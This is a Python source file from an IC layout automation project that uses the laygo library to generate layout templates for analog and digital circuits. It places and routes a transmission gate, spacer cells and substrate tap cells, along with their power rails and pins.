laygo/generators/logic/logic_templates_layout_generator.py
tinapiao/Software-IC-Automation
74b23cd94aa6e4658b110e93b5deb635e014f3a6
[ "BSD-3-Clause" ]
26
2017-07-07T08:06:31.000Z
2021-11-25T06:41:24.000Z
laygo/generators/logic/logic_templates_layout_generator.py
tinapiao/Software-IC-Automation
74b23cd94aa6e4658b110e93b5deb635e014f3a6
[ "BSD-3-Clause" ]
9
2016-12-28T03:08:29.000Z
2019-01-30T16:00:28.000Z
laygo/generators/logic/logic_templates_layout_generator.py
tinapiao/Software-IC-Automation
74b23cd94aa6e4658b110e93b5deb635e014f3a6
[ "BSD-3-Clause" ]
10
2018-07-14T01:31:28.000Z
2021-08-21T10:18:30.000Z
#!/usr/bin/python ######################################################################################################################## # # Copyright (c) 2014, Regents of the University of California # All rights reserved. # # Redistribution and use in source and binary forms, with or without modification, are permitted provided that the # following conditions are met: # # 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following # disclaimer. # 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the # following disclaimer in the documentation and/or other materials provided with the distribution. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, # INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, # WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
# ######################################################################################################################## """Logic layout """ import laygo import numpy as np import yaml import os #import logging;logging.basicConfig(level=logging.DEBUG) def create_io_pin(laygen, layer, gridname, pinname_list, rect_list, offset_y=np.array([-1, 1])): """create digital io pin""" rect_xy_list = [laygen.get_xy(obj =r, gridname=gridname, sort=True) for r in rect_list] #align pins ry = rect_xy_list[0][:, 1] + offset_y.T for i, xy_rect in enumerate(rect_xy_list): xy_rect[:, 1]=ry laygen.pin(name=pinname_list[i], layer=layer, xy=xy_rect, gridname=gridname) def create_power_pin(laygen, layer, gridname, rect_vdd, rect_vss, pinname_vdd='VDD', pinname_vss='VSS'): """create power pin""" rvdd_pin_xy = laygen.get_xy(obj = rect_vdd, gridname = gridname) rvss_pin_xy = laygen.get_xy(obj = rect_vss, gridname = gridname) laygen.pin(name=pinname_vdd, layer=layer, xy=rvdd_pin_xy, gridname=gridname) laygen.pin(name=pinname_vss, layer=layer, xy=rvss_pin_xy, gridname=gridname) def generate_tgate_dn(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, routing_grid_m2m3, routing_grid_m1m2_pin, routing_grid_m2m3_pin, devname_nmos_boundary, devname_nmos_body, devname_nmos_space, devname_pmos_boundary, devname_pmos_body, devname_pmos_space, m=1, origin=np.array([0,0]), create_pin=False): pg = placement_grid rg_m1m2 = routing_grid_m1m2 rg_m2m3 = routing_grid_m2m3 rg_m1m2_pin = routing_grid_m1m2_pin rg_m2m3_pin = routing_grid_m2m3_pin m = max(1, int(m / 2)) # using nf=2 devices # placement in_space = laygen.place("I"+objectname_pfix+'NDMY', devname_nmos_space, pg, shape=np.array([2, 1]), xy=origin) in0 = laygen.relplace(name = "I" + objectname_pfix + 'N0', templatename = devname_nmos_boundary, gridname = pg, refinstname = in_space.name) in1 = laygen.relplace(name = "I"+objectname_pfix+'N1', templatename = devname_nmos_body, gridname = pg, refinstname = in0.name, shape=np.array([m, 1])) in2 
= laygen.relplace(name = "I"+objectname_pfix+'N2', templatename = devname_nmos_boundary, gridname = pg, refinstname = in1.name) in3 = laygen.relplace(name = "I"+objectname_pfix+'N3', templatename = devname_nmos_body, gridname = pg, refinstname = in2.name) in4 = laygen.relplace(name = "I"+objectname_pfix+'N4', templatename = devname_nmos_boundary, gridname = pg, refinstname = in3.name) ip_space = laygen.relplace(name = "I"+objectname_pfix+'PDMY', templatename = devname_pmos_space, gridname = pg, refinstname = in_space.name, direction='top', transform='MX', shape=np.array([2, 1])) ip0 = laygen.relplace(name = "I"+objectname_pfix+'P0', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip_space.name, transform='MX') ip1 = laygen.relplace(name = "I"+objectname_pfix+'P1', templatename = devname_pmos_body, gridname = pg, refinstname = ip0.name, transform='MX', shape=np.array([m, 1])) ip2 = laygen.relplace(name = "I"+objectname_pfix+'P2', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip1.name, transform='MX') ip3 = laygen.relplace(name = "I"+objectname_pfix+'P3', templatename = 'pmos4_fast_space', gridname = pg, refinstname = ip2.name, shape=np.array([3,1]), transform='MX') # route #to vss laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, -1]), gridname0=rg_m1m2, refinstname0=in3.name, refpinname0='S0', refinstindex0=np.array([0, 0]), refinstname1=in3.name, refpinname1='S0', refinstindex1=np.array([0, 0])) laygen.via(None, np.array([0, 0]), refinstname=in3.name, gridname=rg_m1m2, refinstindex=np.array([0, 0])) laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, -1]), gridname0=rg_m1m2, refinstname0=in3.name, refpinname0='S1', refinstindex0=np.array([0, 0]), refinstname1=in3.name, refpinname1='S1', refinstindex1=np.array([0, 0])) laygen.via(None, np.array([0, 0]), refinstname=in3.name, gridname=rg_m1m2, refinstindex=np.array([1, 0])) # en, enb for i in range(m): 
laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='G0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=ip1.name, refpinname='G0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-3, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=in1.name, refpinname1='G0', refinstindex1=np.array([m-1, 0])) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-3, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=ip1.name, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=ip1.name, refpinname1='G0', refinstindex1=np.array([m-1, 0])) ren0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([-3, 0]), xy1=np.array([-3, 2]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='G0', refinstname1=in1.name, refpinname1='G0') laygen.via(None, np.array([-3, 0]), refinstname=in1.name, refpinname='G0', gridname=rg_m2m3) renb0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([-2, 0]), xy1=np.array([-2, 2]), gridname0=rg_m2m3, refinstname0=ip1.name, refpinname0='G0', refinstname1=ip1.name, refpinname1='G0') laygen.via(None, np.array([-2, 0]), refinstname=ip1.name, refpinname='G0', gridname=rg_m2m3) in3_g0_xy = laygen.get_inst_pin_xy(in3.name, 'G0', rg_m2m3) ip1_g0_xy = laygen.get_inst_pin_xy(ip1.name, 'G0', rg_m2m3) laygen.route_vh(layerv=laygen.layers['metal'][3], layerh=laygen.layers['metal'][2], xy0=in3_g0_xy[0], xy1=ip1_g0_xy[0], gridname0=rg_m2m3) laygen.via(None, xy=in3_g0_xy[0], gridname=rg_m2m3) in3_g0_xy = laygen.get_inst_pin_xy(in3.name, 'G0', rg_m1m2) laygen.via(None, xy=in3_g0_xy[0], gridname=rg_m1m2) #input laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='S0', refinstindex0=np.array([0, 0]), refinstname1=in1.name, 
refpinname1='S1', refinstindex1=np.array([m-1, 0])) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=ip1.name, refpinname0='S0', refinstindex0=np.array([0, 0]), refinstname1=ip1.name, refpinname1='S1', refinstindex1=np.array([m-1, 0])) for i in range(m): laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='S0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=ip1.name, refpinname='S0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='S1', refinstindex=np.array([m-1, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=ip1.name, refpinname='S1', refinstindex=np.array([m-1, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='S0', refinstindex=np.array([0, 0]), gridname=rg_m2m3) laygen.via(None, np.array([0, 0]), refinstname=ip1.name, refpinname='S0', refinstindex=np.array([0, 0]), gridname=rg_m2m3) ri0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='S0', refinstindex0=np.array([0, 0]), refinstname1=ip1.name, refpinname1='S0', refinstindex1=np.array([0, 0])) #output laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 1]), xy1=np.array([0, 1]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='S0', refinstindex0=np.array([0, 0]), refinstname1=in1.name, refpinname1='S1', refinstindex1=np.array([m-1, 0])) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 1]), xy1=np.array([0, 1]), gridname0=rg_m2m3, refinstname0=ip1.name, refpinname0='S0', refinstindex0=np.array([0, 0]), refinstname1=ip1.name, refpinname1='S1', refinstindex1=np.array([m-1, 0])) #add for in3 laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 1]), xy1=np.array([0, 1]), gridname0=rg_m2m3, 
refinstname0=in1.name, refpinname0='S0', refinstindex0=np.array([m-1, 0]), refinstname1=in3.name, refpinname1='D0', refinstindex1=np.array([0, 0])) for i in range(m): laygen.via(None, np.array([0, 1]), refinstname=in1.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 1]), refinstname=ip1.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 1]), refinstname=in1.name, refpinname='D0', refinstindex=np.array([m-1, 0]), gridname=rg_m2m3) laygen.via(None, np.array([0, 1]), refinstname=ip1.name, refpinname='D0', refinstindex=np.array([m-1, 0]), gridname=rg_m2m3) #add for in3 laygen.via(None, np.array([0, 1]), refinstname=in3.name, refpinname='D0', refinstindex=np.array([0, 0]), gridname=rg_m1m2) ro0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 1]), xy1=np.array([0, 1]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='D0', refinstindex0=np.array([m-1, 0]), refinstname1=ip1.name, refpinname1='D0', refinstindex1=np.array([m-1, 0])) # power and groud rail xy = laygen.get_xy(obj = ip3.template, gridname = rg_m1m2) * np.array([1, 0]) rvdd = laygen.route("R"+objectname_pfix+"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=ip_space.name, refinstname1=ip3.name, refinstindex1=np.array([2, 0])) rvss = laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in_space.name, refinstname1=in4.name) # pin if create_pin == True: create_io_pin(laygen, layer=laygen.layers['pin'][3], gridname=rg_m2m3_pin, pinname_list = ['EN', 'ENB', 'I', 'O'], rect_list=[ren0, renb0, ri0, ro0]) create_power_pin(laygen, layer=laygen.layers['pin'][2], gridname=rg_m1m2, rect_vdd=rvdd, rect_vss=rvss) def generate_space_1x(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, origin=np.array([0, 0]), create_pin=False): pg = placement_grid 
rg_m1m2=routing_grid_m1m2 # placement in0 = laygen.place("I"+objectname_pfix + 'N0', 'nmos4_fast_space', pg, xy=origin) ip0 = laygen.relplace(name = "I"+objectname_pfix + 'P0', templatename = 'pmos4_fast_space', gridname = pg, refinstname = in0.name, direction='top', transform='MX') # power and groud rail xy = laygen.get_xy(obj = in0.template, gridname = rg_m1m2) * np.array([1, 0]) laygen.route("R"+objectname_pfix+"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip0.name) laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in0.name) # power pin if create_pin==True: rvdd_pin_xy = laygen.get_xy(obj =laygen.get_rect(name = "R"+objectname_pfix+"VDD0"), gridname = rg_m1m2) rvss_pin_xy = laygen.get_xy(obj =laygen.get_rect(name = "R"+objectname_pfix+"VSS0"), gridname = rg_m1m2) laygen.pin(name='VDD', layer=laygen.layers['pin'][2], xy=rvdd_pin_xy, gridname=rg_m1m2) laygen.pin(name='VSS', layer=laygen.layers['pin'][2], xy=rvss_pin_xy, gridname=rg_m1m2) def generate_space_2x(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, origin=np.array([0, 0]), create_pin=False): pg = placement_grid rg_m1m2=routing_grid_m1m2 # placement in0 = laygen.place("I"+objectname_pfix + 'N0', 'nmos4_fast_space_2x', pg, xy=origin) ip0 = laygen.relplace(name = "I"+objectname_pfix + 'P0', templatename = 'pmos4_fast_space_2x', gridname = pg, refinstname = in0.name, direction='top', transform='MX') # power and groud rail xy = laygen.get_xy(obj = in0.template, gridname = rg_m1m2) * np.array([1, 0]) laygen.route("R"+objectname_pfix+"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip0.name) laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in0.name) # 
power pin if create_pin==True: rvdd_pin_xy = laygen.get_xy(obj =laygen.get_rect(name = "R"+objectname_pfix+"VDD0"), gridname = rg_m1m2) rvss_pin_xy = laygen.get_xy(obj =laygen.get_rect(name = "R"+objectname_pfix+"VSS0"), gridname = rg_m1m2) laygen.pin(name='VDD', layer=laygen.layers['pin'][2], xy=rvdd_pin_xy, gridname=rg_m1m2) laygen.pin(name='VSS', layer=laygen.layers['pin'][2], xy=rvss_pin_xy, gridname=rg_m1m2) def generate_space_4x(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, origin=np.array([0, 0]), create_pin=False): pg = placement_grid rg_m1m2=routing_grid_m1m2 # placement in0 = laygen.place("I"+objectname_pfix + 'N0', 'nmos4_fast_space_nf4', pg, xy=origin) ip0 = laygen.relplace(name = "I"+objectname_pfix + 'P0', templatename = 'pmos4_fast_space_nf4', gridname = pg, refinstname = in0.name, direction='top', transform='MX') # power and groud rail xy = laygen.get_xy(obj = in0.template, gridname = rg_m1m2) * np.array([1, 0]) laygen.route("R"+objectname_pfix+"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip0.name) laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in0.name) # power pin if create_pin==True: rvdd_pin_xy = laygen.get_xy(obj =laygen.get_rect(name = "R"+objectname_pfix+"VDD0"), gridname = rg_m1m2) rvss_pin_xy = laygen.get_xy(obj =laygen.get_rect(name = "R"+objectname_pfix+"VSS0"), gridname = rg_m1m2) laygen.pin(name='VDD', layer=laygen.layers['pin'][2], xy=rvdd_pin_xy, gridname=rg_m1m2) laygen.pin(name='VSS', layer=laygen.layers['pin'][2], xy=rvss_pin_xy, gridname=rg_m1m2) def generate_space_wovdd_1x(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, origin=np.array([0, 0]), create_pin=False): pg = placement_grid rg_m1m2=routing_grid_m1m2 # placement in0 = laygen.place("I"+objectname_pfix + 'N0', 'nmos4_fast_space', pg, xy=origin) ip0 = laygen.relplace(name 
= "I"+objectname_pfix + 'P0', templatename = 'nmos4_fast_space', gridname = pg, refinstname = in0.name, direction='top', transform='MX') # power and groud rail xy = laygen.get_xy(obj = in0.template, gridname = rg_m1m2) * np.array([1, 0]) laygen.route("R"+objectname_pfix+"VSS1", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip0.name) laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in0.name) # power pin if create_pin==True: rvdd_pin_xy = laygen.get_xy(obj =laygen.get_rect(name = "R"+objectname_pfix+"VSS1"), gridname = rg_m1m2) rvss_pin_xy = laygen.get_xy(obj =laygen.get_rect(name = "R"+objectname_pfix+"VSS0"), gridname = rg_m1m2) laygen.pin(name='VSS1', layer=laygen.layers['pin'][2], xy=rvdd_pin_xy, gridname=rg_m1m2, netname='VSS') laygen.pin(name='VSS0', layer=laygen.layers['pin'][2], xy=rvss_pin_xy, gridname=rg_m1m2, netname='VSS') def generate_space_wovdd_2x(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, origin=np.array([0, 0]), create_pin=False): pg = placement_grid rg_m1m2=routing_grid_m1m2 # placement in0 = laygen.place("I"+objectname_pfix + 'N0', 'nmos4_fast_space_2x', pg, xy=origin) ip0 = laygen.relplace(name = "I"+objectname_pfix + 'P0', templatename = 'nmos4_fast_space_2x', gridname = pg, refinstname = in0.name, direction='top', transform='MX') # power and groud rail xy = laygen.get_xy(obj = in0.template, gridname = rg_m1m2) * np.array([1, 0]) laygen.route("R"+objectname_pfix+"VSS1", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip0.name) laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in0.name) # power pin if create_pin==True: rvdd_pin_xy = laygen.get_xy(obj =laygen.get_rect(name = 
"R"+objectname_pfix+"VSS1"), gridname = rg_m1m2) rvss_pin_xy = laygen.get_xy(obj =laygen.get_rect(name = "R"+objectname_pfix+"VSS0"), gridname = rg_m1m2) laygen.pin(name='VSS1', layer=laygen.layers['pin'][2], xy=rvdd_pin_xy, gridname=rg_m1m2, netname='VSS') laygen.pin(name='VSS0', layer=laygen.layers['pin'][2], xy=rvss_pin_xy, gridname=rg_m1m2, netname='VSS') def generate_space_wovdd_4x(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, origin=np.array([0, 0]), create_pin=False): pg = placement_grid rg_m1m2=routing_grid_m1m2 # placement in0 = laygen.place("I"+objectname_pfix + 'N0', 'nmos4_fast_space_nf4', pg, xy=origin) ip0 = laygen.relplace(name = "I"+objectname_pfix + 'P0', templatename = 'nmos4_fast_space_nf4', gridname = pg, refinstname = in0.name, direction='top', transform='MX') # power and groud rail xy = laygen.get_xy(obj = in0.template, gridname = rg_m1m2) * np.array([1, 0]) laygen.route("R"+objectname_pfix+"VSS1", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip0.name) laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in0.name) # power pin if create_pin==True: rvdd_pin_xy = laygen.get_xy(obj =laygen.get_rect(name = "R"+objectname_pfix+"VSS1"), gridname = rg_m1m2) rvss_pin_xy = laygen.get_xy(obj =laygen.get_rect(name = "R"+objectname_pfix+"VSS0"), gridname = rg_m1m2) laygen.pin(name='VSS1', layer=laygen.layers['pin'][2], xy=rvdd_pin_xy, gridname=rg_m1m2, netname='VSS') laygen.pin(name='VSS0', layer=laygen.layers['pin'][2], xy=rvss_pin_xy, gridname=rg_m1m2, netname='VSS') def generate_tap(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, devname_nmos_tap, devname_pmos_tap, origin=np.array([0, 0]), create_pin=False): pg = placement_grid rg_m1m2=routing_grid_m1m2 # placement in0 = laygen.place("I"+objectname_pfix + 'N0', devname_nmos_tap, pg, xy=origin) ip0 = 
laygen.relplace(name = "I"+objectname_pfix + 'P0', templatename = devname_pmos_tap, gridname = pg, refinstname = in0.name, direction='top', transform='MX') #tap route xy_tap0 = laygen.get_template_pin_xy(in0.cellname, 'TAP0', rg_m1m2)[0, :] laygen.route(None, laygen.layers['metal'][1], xy0=xy_tap0 * np.array([1, 0]), xy1=xy_tap0, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in0.name) laygen.route(None, laygen.layers['metal'][1], xy0=xy_tap0 * np.array([1, 0]), xy1=xy_tap0, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip0.name) laygen.via(None, xy_tap0 * np.array([1, 0]), refinstname=in0.name, gridname=rg_m1m2) laygen.via(None, xy_tap0 * np.array([1, 0]), refinstname=ip0.name, gridname=rg_m1m2) xy_tap1 = laygen.get_template_pin_xy(in0.cellname, 'TAP0', rg_m1m2)[0, :] laygen.route(None, laygen.layers['metal'][1], xy0=xy_tap1 * np.array([1, 0]), xy1=xy_tap1, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in0.name) laygen.route(None, laygen.layers['metal'][1], xy0=xy_tap1 * np.array([1, 0]), xy1=xy_tap1, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip0.name) laygen.via(None, xy_tap1 * np.array([1, 0]), refinstname=in0.name, gridname=rg_m1m2) laygen.via(None, xy_tap1 * np.array([1, 0]), refinstname=ip0.name, gridname=rg_m1m2) # power and groud rail xy = laygen.get_xy(obj = in0.template, gridname = rg_m1m2) * np.array([1, 0]) laygen.route("R"+objectname_pfix+"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip0.name) laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in0.name) # power pin if create_pin==True: rvdd_pin_xy = laygen.get_xy(obj =laygen.get_rect(name = "R"+objectname_pfix+"VDD0"), gridname = rg_m1m2) rvss_pin_xy = laygen.get_xy(obj =laygen.get_rect(name = "R"+objectname_pfix+"VSS0"), gridname = rg_m1m2) laygen.pin(name='VDD', 
layer=laygen.layers['pin'][2], xy=rvdd_pin_xy, gridname=rg_m1m2) laygen.pin(name='VSS', layer=laygen.layers['pin'][2], xy=rvss_pin_xy, gridname=rg_m1m2) def generate_tap_float(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, devname_nmos_tap, devname_pmos_tap, origin=np.array([0, 0]), create_pin=False): pg = placement_grid rg_m1m2=routing_grid_m1m2 # placement in0 = laygen.place("I"+objectname_pfix + 'N0', devname_nmos_tap, pg, xy=origin) ip0 = laygen.relplace(name = "I"+objectname_pfix + 'P0', templatename = devname_pmos_tap, gridname = pg, refinstname = in0.name, direction='top', transform='MX') #tap route xy_tap0 = laygen.get_template_pin_xy(in0.cellname, 'TAP0', rg_m1m2)[0, :] xy_tap1 = laygen.get_template_pin_xy(in0.cellname, 'TAP0', rg_m1m2)[0, :] laygen.route(None, laygen.layers['metal'][1], xy0=xy_tap1 * np.array([1, 0]), xy1=xy_tap1, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip0.name, via0=[0,0]) # power and groud rail xy = laygen.get_template_xy(name = in0.cellname, gridname = rg_m1m2) * np.array([1, 0]) laygen.route("R"+objectname_pfix+"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip0.name) laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in0.name) # power pin if create_pin==True: rvdd_pin_xy = laygen.get_rect_xy(name = "R"+objectname_pfix+"VDD0", gridname = rg_m1m2) rvss_pin_xy = laygen.get_rect_xy(name = "R"+objectname_pfix+"VSS0", gridname = rg_m1m2) laygen.pin(name='VDD', layer=laygen.layers['pin'][2], xy=rvdd_pin_xy, gridname=rg_m1m2) laygen.pin(name='VSS', layer=laygen.layers['pin'][2], xy=rvss_pin_xy, gridname=rg_m1m2) def generate_tap_float_pmos_vss(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, devname_nmos_tap, devname_pmos_tap, origin=np.array([0, 0]), create_pin=False): pg = placement_grid rg_m1m2=routing_grid_m1m2 # placement in0 
= laygen.place("I"+objectname_pfix + 'N0', devname_nmos_tap, pg, xy=origin) ip0 = laygen.relplace(name = "I"+objectname_pfix + 'P0', templatename = devname_pmos_tap, gridname = pg, refinstname = in0.name, direction='top', transform='MX') #tap route xy_tap0 = laygen.get_template_pin_xy(in0.cellname, 'TAP0', rg_m1m2)[0, :] xy_tap1 = laygen.get_template_pin_xy(in0.cellname, 'TAP0', rg_m1m2)[0, :] laygen.route(None, laygen.layers['metal'][2], xy0=xy_tap1, xy1=xy_tap1-np.array([2,0]), gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip0.name, via0=np.array([0,0]), via1=np.array([0,0])) laygen.route(None, laygen.layers['metal'][1], xy0=xy_tap1 * np.array([1, 0])-np.array([2,0]), xy1=xy_tap1-np.array([2,0]), gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=ip0.name) laygen.via(None, xy_tap1 * np.array([1, 0]) - np.array([2,0]), refinstname=in0.name, gridname=rg_m1m2) # power and groud rail xy = laygen.get_template_xy(name = in0.cellname, gridname = rg_m1m2) * np.array([1, 0]) laygen.route("R"+objectname_pfix+"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip0.name) laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in0.name) # power pin if create_pin==True: rvdd_pin_xy = laygen.get_rect_xy(name = "R"+objectname_pfix+"VDD0", gridname = rg_m1m2) rvss_pin_xy = laygen.get_rect_xy(name = "R"+objectname_pfix+"VSS0", gridname = rg_m1m2) laygen.pin(name='VDD', layer=laygen.layers['pin'][2], xy=rvdd_pin_xy, gridname=rg_m1m2) laygen.pin(name='VSS', layer=laygen.layers['pin'][2], xy=rvss_pin_xy, gridname=rg_m1m2) def generate_tap_pmos_vss(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, devname_nmos_tap, devname_pmos_tap, origin=np.array([0, 0]), create_pin=False): pg = placement_grid rg_m1m2=routing_grid_m1m2 # placement in0 = laygen.place("I"+objectname_pfix + 'N0', devname_nmos_tap, pg, 
xy=origin) ip0 = laygen.relplace(name = "I"+objectname_pfix + 'P0', templatename = devname_pmos_tap, gridname = pg, refinstname = in0.name, direction='top', transform='MX') #tap route xy_tap0 = laygen.get_template_pin_xy(in0.cellname, 'TAP0', rg_m1m2)[0, :] laygen.route(None, laygen.layers['metal'][1], xy0=xy_tap0 * np.array([1, 0]), xy1=xy_tap0, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in0.name) laygen.route(None, laygen.layers['metal'][1], xy0=xy_tap0 * np.array([1, 0])+[0,1], xy1=xy_tap0, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=in0.name) laygen.via(None, xy_tap0 * np.array([1, 0]), refinstname=in0.name, gridname=rg_m1m2) xy_tap1 = laygen.get_template_pin_xy(in0.cellname, 'TAP0', rg_m1m2)[0, :] laygen.route(None, laygen.layers['metal'][1], xy0=xy_tap1 * np.array([1, 0]), xy1=xy_tap1, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in0.name) laygen.route(None, laygen.layers['metal'][1], xy0=xy_tap1 * np.array([1, 0])+[0,1], xy1=xy_tap1, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=in0.name) laygen.via(None, xy_tap1 * np.array([1, 0]), refinstname=in0.name, gridname=rg_m1m2) # power and groud rail xy = laygen.get_template_xy(name = in0.cellname, gridname = rg_m1m2) * np.array([1, 0]) laygen.route("R"+objectname_pfix+"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip0.name) laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in0.name) # power pin if create_pin==True: rvdd_pin_xy = laygen.get_rect_xy(name = "R"+objectname_pfix+"VDD0", gridname = rg_m1m2) rvss_pin_xy = laygen.get_rect_xy(name = "R"+objectname_pfix+"VSS0", gridname = 